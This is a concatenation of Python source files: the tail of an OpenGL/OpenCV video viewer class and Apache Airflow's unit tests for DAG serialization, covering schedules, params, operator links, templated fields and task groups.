cv2.destroyAllWindows()
cv2.waitKey(1)
return
self.image_buffer = None
else:
time.sleep(0.008)
def __gl_resize(self, Width, Height): # Retina problem.
x, y, w, h = glGetIntegerv(GL_VIEWPORT)
self.window_width = w
self.window_height = h
#glViewport(0, 0, w, h)
# glViewport(0, 0, Width, Height)
#glfwGetFramebufferSize(window, &width, &height);
# glViewport(0, 0, int(self.window_width), int(self.window_height))
def __gl_keyboard(self, key, x, y):
if type(key) == bytes:
key = ord(key)
else:
key = 0x0100 + key
if self.keyboard_listener: self.keyboard_listener(key, x, y)
if key == b'q' or key == b'\x1b' or key == b'\x03':
if self.destructor_function is not None:
logger.info("Call destructor function")
self.destructor_function()
exit(9)
return
def __gl_draw(self):
self.cnt2 += 1
if self.idle_function is not None:
try:
self.idle_function()
except:
try:
glutLeaveMainLoop()
except:
os._exit(0)
# try:
# except Exception as e:
# exit(9)
# glutDestroyWindow(self.window_name)
if self.image_buffer is not None:
try:
self.cnt += 1
if time.time() - self.tm > 1.0:
logger.info(f"\033[0KViewer[GPU]-FPS {self.cnt} Idle {self.cnt2}\033[1A")
self.tm = time.time()
self.cnt = 0
self.cnt2 = 0
for i in threading.enumerate():
if i.name == "MainThread":
if i.is_alive() is False:
exit(9)
return
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
glColor3f(1.0, 1.0, 1.0)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
glOrtho(-1, 1, -1, 1, -1, 1)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
glTexImage2D(GL_TEXTURE_2D, 0, GL_RGB, self.image_buffer.shape[1], self.image_buffer.shape[0], 0, GL_RGB, GL_UNSIGNED_BYTE, self.image_buffer)
glEnable(GL_TEXTURE_2D)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)
glBegin(GL_QUADS)
glTexCoord2d(0.0, 1.0)
w = self.window_width
h = self.window_height
iw = self.image_buffer.shape[1]
ih = self.image_buffer.shape[0]
r = w / h
ir = iw / ih
x_ratio = 1.0
y_ratio = 1.0
if r > ir:
x_ratio = ir / r
else:
y_ratio = r / ir
glVertex3d(-x_ratio, -y_ratio, 0.0)
glTexCoord2d(1.0, 1.0)
glVertex3d(x_ratio, -y_ratio, 0.0)
glTexCoord2d(1.0, 0.0)
glVertex3d(x_ratio, y_ratio, 0.0)
glTexCoord2d(0.0, 0.0)
glVertex3d(-x_ratio, y_ratio, 0.0)
glEnd()
glFlush()
if self.double_buffer:
glutSwapBuffers()
except Exception as e:
logger.error(e)
exit(9)
return
self.image_buffer = None
if time.time() - self.previous_time < 0.008:
time.sleep(0.005)
self.previous_time = time.time()
if __name__ == '__main__':
import cv2
import argparse
handler = logging.StreamHandler(sys.stdout)
handler.setLevel(logging.DEBUG)
handler.setFormatter(logging.Formatter("%(asctime)s [%(filename)s:%(lineno)d] %(message)s"))
logger.addHandler(handler)
logger.setLevel(logging.DEBUG)
logger.handlers.clear()
import coloredlogs
coloredlogs.install()
parser = argparse.ArgumentParser(description='')
parser.add_argument('input', type=str, help='')
parser.add_argument('--codec', type=str, default="libx265", help='')
parser.add_argument('--quality', type=int, default=None, help='')
parser.add_argument('--quality_adjust', type=int, default=None, help='+6=low, +3=middle, high=0')
parser.add_argument('--quality_test', action='store_true')
parser.add_argument('--resolution', type=int, default=0, help='0/1280/1920')
parser.add_argument('--test', action='store_true')
parser.add_argument('--animation', action='store_true')
parser.add_argument('--volume', type=str, default=None, help='')
parser.add_argument('--disable_two_pass', action='store_true')
parser.add_argument('--generate', action='store_true')
parser.add_argument('--disable_audio_normalize', action='store_true')
args = parser.parse_args()
viewer = Viewer(cpu=False, fullscreen=False)
# viewer = Viewer(opengl_direct=False)
# viewer = Viewer(window_width=512,window_height=512,fullscreen=True,opengl_direct=True)
# viewer = Viewer(window_width=512,window_height=512,fullscreen=True,opengl_direct=False)
cap = cv2.VideoCapture(os.path.expanduser(args.input))
if cap is None:
logger.debug("Could not detect capture fd")
exit(9)
def loop():
check, frame = cap.read()
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
if check:
viewer.set_image(frame)
viewer.set_loop(loop)
viewer.start()
logger.debug("Main thread ended")
else:
logger.addHandler(logging.NullHandler())
|
test_dag_serialization.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Unit tests for stringified DAGs."""
import multiprocessing
import os
import unittest
from datetime import datetime, timedelta, timezone
from glob import glob
from unittest import mock
from dateutil.relativedelta import FR, relativedelta
from kubernetes.client import models as k8s
from parameterized import parameterized
from airflow.hooks.base_hook import BaseHook
from airflow.kubernetes.pod_generator import PodGenerator
from airflow.models import DAG, Connection, DagBag, TaskInstance
from airflow.models.baseoperator import BaseOperator
from airflow.operators.bash import BashOperator
from airflow.serialization.json_schema import load_dag_schema_dict
from airflow.serialization.serialized_objects import SerializedBaseOperator, SerializedDAG
from tests.test_utils.mock_operators import CustomOperator, CustomOpLink, GoogleLink
executor_config_pod = k8s.V1Pod(
metadata=k8s.V1ObjectMeta(name="my-name"),
spec=k8s.V1PodSpec(containers=[
k8s.V1Container(
name="base",
volume_mounts=[
k8s.V1VolumeMount(
name="my-vol",
mount_path="/vol/"
)
]
)
]))
serialized_simple_dag_ground_truth = {
"__version": 1,
"dag": {
"default_args": {
"__type": "dict",
"__var": {
"depends_on_past": False,
"retries": 1,
"retry_delay": {
"__type": "timedelta",
"__var": 300.0
}
}
},
"start_date": 1564617600.0,
'_task_group': {'_group_id': None,
'prefix_group_id': True,
'children': {'bash_task': ('operator', 'bash_task'),
'custom_task': ('operator', 'custom_task')},
'tooltip': '',
'ui_color': 'CornflowerBlue',
'ui_fgcolor': '#000',
'upstream_group_ids': [],
'downstream_group_ids': [],
'upstream_task_ids': [],
'downstream_task_ids': []},
"is_paused_upon_creation": False,
"_dag_id": "simple_dag",
"fileloc": None,
"tasks": [
{
"task_id": "bash_task",
"owner": "airflow",
"retries": 1,
"retry_delay": 300.0,
"_downstream_task_ids": [],
"_inlets": [],
"_outlets": [],
"ui_color": "#f0ede4",
"ui_fgcolor": "#000",
"template_fields": ['bash_command', 'env'],
"template_fields_renderers": {'bash_command': 'bash', 'env': 'json'},
"bash_command": "echo {{ task.task_id }}",
'label': 'bash_task',
"_task_type": "BashOperator",
"_task_module": "airflow.operators.bash",
"pool": "default_pool",
"executor_config": {'__type': 'dict',
'__var': {"pod_override": {
'__type': 'k8s.V1Pod',
'__var': PodGenerator.serialize_pod(executor_config_pod)}
}
}
},
{
"task_id": "custom_task",
"retries": 1,
"retry_delay": 300.0,
"_downstream_task_ids": [],
"_inlets": [],
"_outlets": [],
"_operator_extra_links": [{"tests.test_utils.mock_operators.CustomOpLink": {}}],
"ui_color": "#fff",
"ui_fgcolor": "#000",
"template_fields": ['bash_command'],
"template_fields_renderers": {},
"_task_type": "CustomOperator",
"_task_module": "tests.test_utils.mock_operators",
"pool": "default_pool",
'label': 'custom_task',
},
],
"timezone": "UTC",
"_access_control": {
"__type": "dict",
"__var": {
"test_role": {
"__type": "set",
"__var": [
"can_dag_read",
"can_dag_edit"
]
}
}
}
},
}
ROOT_FOLDER = os.path.realpath(
os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir, os.pardir)
)
def make_example_dags(module_path):
"""Loads DAGs from a module for test."""
dagbag = DagBag(module_path)
return dagbag.dags
def make_simple_dag():
"""Make very simple DAG to verify serialization result."""
with DAG(
dag_id='simple_dag',
default_args={
"retries": 1,
"retry_delay": timedelta(minutes=5),
"depends_on_past": False,
},
start_date=datetime(2019, 8, 1),
is_paused_upon_creation=False,
access_control={
"test_role": {"can_dag_read", "can_dag_edit"}
}
) as dag:
CustomOperator(task_id='custom_task')
BashOperator(task_id='bash_task', bash_command='echo {{ task.task_id }}', owner='airflow',
executor_config={"pod_override": executor_config_pod})
return {'simple_dag': dag}
def make_user_defined_macro_filter_dag():
"""Make DAGs with user defined macros and filters using locally defined methods.
For Webserver, we do not include ``user_defined_macros`` & ``user_defined_filters``.
The examples here test:
(1) functions can be successfully displayed on UI;
(2) templates with function macros have been rendered before serialization.
"""
def compute_next_execution_date(dag, execution_date):
return dag.following_schedule(execution_date)
default_args = {
'start_date': datetime(2019, 7, 10)
}
dag = DAG(
'user_defined_macro_filter_dag',
default_args=default_args,
user_defined_macros={
'next_execution_date': compute_next_execution_date,
},
user_defined_filters={
'hello': lambda name: 'Hello %s' % name
},
catchup=False
)
BashOperator(
task_id='echo',
bash_command='echo "{{ next_execution_date(dag, execution_date) }}"',
dag=dag,
)
return {dag.dag_id: dag}
def collect_dags(dag_folder=None):
"""Collects DAGs to test."""
dags = {}
dags.update(make_simple_dag())
dags.update(make_user_defined_macro_filter_dag())
if dag_folder:
if isinstance(dag_folder, (list, tuple)):
patterns = dag_folder
else:
patterns = [dag_folder]
else:
patterns = [
"airflow/example_dags",
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
for pattern in patterns:
for directory in glob(f"{ROOT_FOLDER}/{pattern}"):
dags.update(make_example_dags(directory))
# Filter subdags as they are stored in same row in Serialized Dag table
dags = {dag_id: dag for dag_id, dag in dags.items() if not dag.is_subdag}
return dags
def serialize_subprocess(queue, dag_folder):
"""Validate pickle in a subprocess."""
dags = collect_dags(dag_folder)
for dag in dags.values():
queue.put(SerializedDAG.to_json(dag))
queue.put(None)
class TestStringifiedDAGs(unittest.TestCase):
"""Unit tests for stringified DAGs."""
def setUp(self):
super().setUp()
BaseHook.get_connection = mock.Mock(
return_value=Connection(
extra=('{'
'"project_id": "mock", '
'"location": "mock", '
'"instance": "mock", '
'"database_type": "postgres", '
'"use_proxy": "False", '
'"use_ssl": "False"'
'}')))
self.maxDiff = None # pylint: disable=invalid-name
def test_serialization(self):
"""Serialization and deserialization should work for every DAG and Operator."""
dags = collect_dags()
serialized_dags = {}
for _, v in dags.items():
dag = SerializedDAG.to_dict(v)
SerializedDAG.validate_schema(dag)
serialized_dags[v.dag_id] = dag
# Compares with the ground truth of JSON string.
self.validate_serialized_dag(
serialized_dags['simple_dag'],
serialized_simple_dag_ground_truth)
def validate_serialized_dag(self, json_dag, ground_truth_dag):
"""Verify serialized DAGs match the ground truth."""
self.assertTrue(
json_dag['dag']['fileloc'].split('/')[-1] == 'test_dag_serialization.py')
json_dag['dag']['fileloc'] = None
def sorted_serialized_dag(dag_dict: dict):
"""
Sorts the "tasks" list and "access_control" permissions in the
serialised dag python dictionary. This is needed as the order of
items should not matter but assertEqual would fail if the order of
items changes in the dag dictionary
"""
dag_dict["dag"]["tasks"] = sorted(dag_dict["dag"]["tasks"],
key=lambda x: sorted(x.keys()))
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"] = sorted(
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"]
)
return dag_dict
assert sorted_serialized_dag(ground_truth_dag) == sorted_serialized_dag(json_dag)
def test_deserialization_across_process(self):
"""A serialized DAG can be deserialized in another process."""
# Since we need to parse the dags twice here (once in the subprocess,
# and once here to get a DAG to compare to) we don't want to load all
# dags.
queue = multiprocessing.Queue()
proc = multiprocessing.Process(
target=serialize_subprocess, args=(queue, "airflow/example_dags"))
proc.daemon = True
proc.start()
stringified_dags = {}
while True:
v = queue.get()
if v is None:
break
dag = SerializedDAG.from_json(v)
self.assertTrue(isinstance(dag, DAG))
stringified_dags[dag.dag_id] = dag
dags = collect_dags("airflow/example_dags")
assert set(stringified_dags.keys()) == set(dags.keys())
# Verify deserialized DAGs.
for dag_id in stringified_dags:
self.validate_deserialized_dag(stringified_dags[dag_id], dags[dag_id])
def test_roundtrip_provider_example_dags(self):
dags = collect_dags([
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
])
# Verify deserialized DAGs.
for dag in dags.values():
serialized_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(serialized_dag, dag)
def validate_deserialized_dag(self, serialized_dag, dag):
"""
Verify that all example DAGs work with DAG Serialization by
checking fields between Serialized Dags & non-Serialized Dags
"""
fields_to_check = dag.get_serialized_fields() - {
# Doesn't implement __eq__ properly. Check manually
'timezone',
# Need to check fields in it, to exclude functions
'default_args',
"_task_group"
}
for field in fields_to_check:
assert getattr(serialized_dag, field) == getattr(dag, field), \
f'{dag.dag_id}.{field} does not match'
if dag.default_args:
for k, v in dag.default_args.items():
if callable(v):
# Check we stored _someting_.
assert k in serialized_dag.default_args
else:
assert v == serialized_dag.default_args[k], \
f'{dag.dag_id}.default_args[{k}] does not match'
assert serialized_dag.timezone.name == dag.timezone.name
for task_id in dag.task_ids:
self.validate_deserialized_task(serialized_dag.get_task(task_id), dag.get_task(task_id))
# Verify that the DAG object has 'full_filepath' attribute
# and is equal to fileloc
assert serialized_dag.full_filepath == dag.fileloc
def validate_deserialized_task(self, serialized_task, task,):
"""Verify non-airflow operators are casted to BaseOperator."""
assert isinstance(serialized_task, SerializedBaseOperator)
assert not isinstance(task, SerializedBaseOperator)
assert isinstance(task, BaseOperator)
fields_to_check = task.get_serialized_fields() - {
# Checked separately
'_task_type', 'subdag',
# Type is exluded, so don't check it
'_log',
# List vs tuple. Check separately
'template_fields',
# We store the string, real dag has the actual code
'on_failure_callback', 'on_success_callback', 'on_retry_callback',
# Checked separately
'resources',
}
assert serialized_task.task_type == task.task_type
assert set(serialized_task.template_fields) == set(task.template_fields)
assert serialized_task.upstream_task_ids == task.upstream_task_ids
assert serialized_task.downstream_task_ids == task.downstream_task_ids
for field in fields_to_check:
assert getattr(serialized_task, field) == getattr(task, field), \
f'{task.dag.dag_id}.{task.task_id}.{field} does not match'
if serialized_task.resources is None:
assert task.resources is None or task.resources == []
else:
assert serialized_task.resources == task.resources
# Check that for Deserialised task, task.subdag is None for all other Operators
# except for the SubDagOperator where task.subdag is an instance of DAG object
if task.task_type == "SubDagOperator":
assert serialized_task.subdag is not None
assert isinstance(serialized_task.subdag, DAG)
else:
assert serialized_task.subdag is None
@parameterized.expand([
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(datetime(2019, 8, 1, tzinfo=timezone.utc), datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc)),
(datetime(2019, 8, 1, tzinfo=timezone.utc), datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc)),
])
def test_deserialization_start_date(self,
dag_start_date,
task_start_date,
expected_task_start_date):
dag = DAG(dag_id='simple_dag', start_date=dag_start_date)
BaseOperator(task_id='simple_task', dag=dag, start_date=task_start_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_start_date or dag_start_date >= task_start_date:
# If dag.start_date > task.start_date -> task.start_date=dag.start_date
# because of the logic in dag.add_task()
self.assertNotIn("start_date", serialized_dag["dag"]["tasks"][0])
else:
self.assertIn("start_date", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(simple_task.start_date, expected_task_start_date)
@parameterized.expand([
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(datetime(2019, 8, 1, tzinfo=timezone.utc), datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc)),
(datetime(2019, 8, 1, tzinfo=timezone.utc), datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc)),
])
def test_deserialization_end_date(self,
dag_end_date,
task_end_date,
expected_task_end_date):
dag = DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1),
end_date=dag_end_date)
BaseOperator(task_id='simple_task', dag=dag, end_date=task_end_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_end_date or dag_end_date <= task_end_date:
# If dag.end_date < task.end_date -> task.end_date=dag.end_date
# because of the logic in dag.add_task()
self.assertNotIn("end_date", serialized_dag["dag"]["tasks"][0])
else:
self.assertIn("end_date", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(simple_task.end_date, expected_task_end_date)
@parameterized.expand([
(None, None, None),
("@weekly", "@weekly", "0 0 * * 0"),
("@once", "@once", None),
({"__type": "timedelta", "__var": 86400.0}, timedelta(days=1), timedelta(days=1)),
])
def test_deserialization_schedule_interval(
self, serialized_schedule_interval, expected_schedule_interval, expected_n_schedule_interval
):
serialized = {
"__version": 1,
"dag": {
"default_args": {"__type": "dict", "__var": {}},
"_dag_id": "simple_dag",
"fileloc": __file__,
"tasks": [],
"timezone": "UTC",
"schedule_interval": serialized_schedule_interval,
},
}
SerializedDAG.validate_schema(serialized)
dag = SerializedDAG.from_dict(serialized)
self.assertEqual(dag.schedule_interval, expected_schedule_interval)
self.assertEqual(dag.normalized_schedule_interval, expected_n_schedule_interval)
@parameterized.expand([
(relativedelta(days=-1), {"__type": "relativedelta", "__var": {"days": -1}}),
(relativedelta(month=1, days=-1), {"__type": "relativedelta", "__var": {"month": 1, "days": -1}}),
# Every friday
(relativedelta(weekday=FR), {"__type": "relativedelta", "__var": {"weekday": [4]}}),
# Every second friday
(relativedelta(weekday=FR(2)), {"__type": "relativedelta", "__var": {"weekday": [4, 2]}})
])
def test_roundtrip_relativedelta(self, val, expected):
serialized = SerializedDAG._serialize(val)
self.assertDictEqual(serialized, expected)
round_tripped = SerializedDAG._deserialize(serialized)
self.assertEqual(val, round_tripped)
@parameterized.expand([
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
])
def test_dag_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag', params=val)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
self.assertIn("params", serialized_dag["dag"])
else:
self.assertNotIn("params", serialized_dag["dag"])
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
self.assertEqual(expected_val, deserialized_dag.params)
self.assertEqual(expected_val, deserialized_simple_task.params)
@parameterized.expand([
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
])
def test_task_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag')
BaseOperator(task_id='simple_task', dag=dag, params=val,
start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
self.assertIn("params", serialized_dag["dag"]["tasks"][0])
else:
self.assertNotIn("params", serialized_dag["dag"]["tasks"][0])
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
self.assertEqual(expected_val, deserialized_simple_task.params)
def test_extra_serialized_field_and_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This tests also depends on GoogleLink() registered as a plugin
in tests/plugins/test_plugin.py
The function tests that if extra operator links are registered in plugin
in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command="true")
serialized_dag = SerializedDAG.to_dict(dag)
self.assertIn("bash_command", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(getattr(simple_task, "bash_command"), "true")
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
self.assertEqual(
serialized_dag["dag"]["tasks"][0]["_operator_extra_links"],
[{'tests.test_utils.mock_operators.CustomOpLink': {}}]
)
# Test all the extra_links are set
self.assertCountEqual(simple_task.extra_links, ['Google Custom', 'airflow', 'github', 'google'])
ti = TaskInstance(task=simple_task, execution_date=test_date)
ti.xcom_push('search_query', "dummy_value_1")
# Test Deserialized inbuilt link
custom_inbuilt_link = simple_task.get_extra_links(test_date, CustomOpLink.name)
self.assertEqual('http://google.com/custom_base_link?search=dummy_value_1', custom_inbuilt_link)
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
self.assertEqual("https://www.google.com", google_link_from_plugin)
def test_extra_serialized_field_and_multiple_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This tests also depends on GoogleLink() registered as a plugin
in tests/plugins/test_plugin.py
The function tests that if extra operator links are registered in plugin
in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command=["echo", "true"])
serialized_dag = SerializedDAG.to_dict(dag)
self.assertIn("bash_command", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(getattr(simple_task, "bash_command"), ["echo", "true"])
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
self.assertEqual(
serialized_dag["dag"]["tasks"][0]["_operator_extra_links"],
[
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 0}},
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 1}},
]
)
# Test all the extra_links are set
self.assertCountEqual(simple_task.extra_links, [
'BigQuery Console #1', 'BigQuery Console #2', 'airflow', 'github', 'google'])
ti = TaskInstance(task=simple_task, execution_date=test_date)
ti.xcom_push('search_query', ["dummy_value_1", "dummy_value_2"])
# Test Deserialized inbuilt link #1
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #1")
self.assertEqual('https://console.cloud.google.com/bigquery?j=dummy_value_1', custom_inbuilt_link)
# Test Deserialized inbuilt link #2
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #2")
self.assertEqual('https://console.cloud.google.com/bigquery?j=dummy_value_2', custom_inbuilt_link)
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
self.assertEqual("https://www.google.com", google_link_from_plugin)
class ClassWithCustomAttributes:
"""
Class for testing purpose: allows to create objects with custom attributes in one single statement.
"""
def __init__(self, **kwargs):
for key, value in kwargs.items():
setattr(self, key, value)
def __str__(self):
return "{}({})".format(self.__class__.__name__, str(self.__dict__))
def __repr__(self):
return self.__str__()
def __eq__(self, other):
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self.__eq__(other)
@parameterized.expand([
(None, None),
([], []),
({}, {}),
("{{ task.task_id }}", "{{ task.task_id }}"),
(["{{ task.task_id }}", "{{ task.task_id }}"]),
({"foo": "{{ task.task_id }}"}, {"foo": "{{ task.task_id }}"}),
({"foo": {"bar": "{{ task.task_id }}"}}, {"foo": {"bar": "{{ task.task_id }}"}}),
(
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
),
(
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}}),
(
ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]),
"ClassWithCustomAttributes("
"{'att1': '{{ task.task_id }}', 'att2': '{{ task.task_id }}', 'template_fields': ['att1']})",
),
(
ClassWithCustomAttributes(nested1=ClassWithCustomAttributes(att1="{{ task.task_id }}",
att2="{{ task.task_id }}",
template_fields=["att1"]),
nested2=ClassWithCustomAttributes(att3="{{ task.task_id }}",
att4="{{ task.task_id }}",
template_fields=["att3"]),
template_fields=["nested1"]),
"ClassWithCustomAttributes("
"{'nested1': ClassWithCustomAttributes({'att1': '{{ task.task_id }}', "
"'att2': '{{ task.task_id }}', 'template_fields': ['att1']}), "
"'nested2': ClassWithCustomAttributes({'att3': '{{ task.task_id }}', "
"'att4': '{{ task.task_id }}', 'template_fields': ['att3']}), 'template_fields': ['nested1']})",
),
])
def test_templated_fields_exist_in_serialized_dag(self, templated_field, expected_field):
"""
Test that templated_fields exists for all Operators in Serialized DAG
Since we don't want to inflate arbitrary python objects (it poses a RCE/security risk etc.)
we want check that non-"basic" objects are turned in to strings after deserializing.
"""
dag = DAG("test_serialized_template_fields", start_date=datetime(2019, 8, 1))
with dag:
BashOperator(task_id="test", bash_command=templated_field)
serialized_dag = SerializedDAG.to_dict(dag)
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_test_task = deserialized_dag.task_dict["test"]
self.assertEqual(expected_field, getattr(deserialized_test_task, "bash_command"))
def test_dag_serialized_fields_with_schema(self):
"""
Additional Properties are disabled on DAGs. This test verifies that all the
keys in DAG.get_serialized_fields are listed in Schema definition.
"""
dag_schema: dict = load_dag_schema_dict()["definitions"]["dag"]["properties"]
# The parameters we add manually in Serialization needs to be ignored
ignored_keys: set = {"is_subdag", "tasks"}
dag_params: set = set(dag_schema.keys()) - ignored_keys
self.assertEqual(set(DAG.get_serialized_fields()), dag_params)
def test_operator_subclass_changing_base_defaults(self):
assert BaseOperator(task_id='dummy').do_xcom_push is True, \
"Precondition check! If this fails the test won't make sense"
class MyOperator(BaseOperator):
def __init__(self, do_xcom_push=False, **kwargs):
super().__init__(**kwargs)
self.do_xcom_push = do_xcom_push
op = MyOperator(task_id='dummy')
assert op.do_xcom_push is False
blob = SerializedBaseOperator.serialize_operator(op)
serialized_op = SerializedBaseOperator.deserialize_operator(blob)
assert serialized_op.do_xcom_push is False
def test_no_new_fields_added_to_base_operator(self):
"""
This test verifies that there are no new fields added to BaseOperator. And reminds that
tests should be added for it.
"""
base_operator = BaseOperator(task_id="10")
fields = base_operator.__dict__
self.assertEqual({'_BaseOperator__instantiated': True,
'_dag': None,
'_downstream_task_ids': set(),
'_inlets': [],
'_log': base_operator.log,
'_outlets': [],
'_upstream_task_ids': set(),
'depends_on_past': False,
'do_xcom_push': True,
'email': None,
'email_on_failure': True,
'email_on_retry': True,
'end_date': None,
'execution_timeout': None,
'executor_config': {},
'inlets': [],
'label': '10',
'max_retry_delay': None,
'on_execute_callback': None,
'on_failure_callback': None,
'on_retry_callback': None,
'on_success_callback': None,
'outlets': [],
'owner': 'airflow',
'params': {},
'pool': 'default_pool',
'pool_slots': 1,
'priority_weight': 1,
'queue': 'default',
'resources': None,
'retries': 0,
'retry_delay': timedelta(0, 300),
'retry_exponential_backoff': False,
'run_as_user': None,
'sla': None,
'start_date': None,
'subdag': None,
'task_concurrency': None,
'task_id': '10',
'trigger_rule': 'all_success',
'wait_for_downstream': False,
'weight_rule': 'downstream'}, fields,
"""
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
ACTION NEEDED! PLEASE READ THIS CAREFULLY AND CORRECT TESTS CAREFULLY
Some fields were added to the BaseOperator! Please add them to the list above and make sure that
you add support for DAG serialization - you should add the field to
`airflow/serialization/schema.json` - they should have correct type defined there.
Note that we do not support versioning yet so you should only add optional fields to BaseOperator.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
"""
)
def test_task_group_serialization(self):
"""
Test TaskGroup serialization/deserialization.
"""
from airflow.operators.dummy_operator import DummyOperator
from airflow.utils.task_group import TaskGroup
execution_date = datetime(2020, 1, 1)
with DAG("test_task_group_serialization", start_date=execution_date) as dag:
task1 = DummyOperator(task_id="task1")
with TaskGroup("group234") as group234:
_ = DummyOperator(task_id="task2")
with TaskGroup("group34") as group34:
_ = DummyOperator(task_id="task3")
_ = DummyOperator(task_id="task4")
task5 = DummyOperator(task_id="task5")
task1 >> group234
group34 >> task5
dag_dict = SerializedDAG.to_dict(dag)
SerializedDAG.validate_schema(dag_dict)
json_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(json_dag, dag)
serialized_dag = SerializedDAG.deserialize_dag(SerializedDAG.serialize_dag(dag))
assert serialized_dag.task_group.children
assert serialized_dag.task_group.children.keys() == dag.task_group.children.keys()
def check_task_group(node):
try:
children = node.children.values()
except AttributeError:
# Round-trip serialization and check the result
expected_serialized = SerializedBaseOperator.serialize_operator(dag.get_task(node.task_id))
expected_deserialized = SerializedBaseOperator.deserialize_operator(expected_serialized)
expected_dict = SerializedBaseOperator.serialize_operator(expected_deserialized)
assert node
assert SerializedBaseOperator.serialize_operator(node) == expected_dict
return
for child in children:
check_task_group(child)
check_task_group(serialized_dag.task_group)
|
__init__.py
|
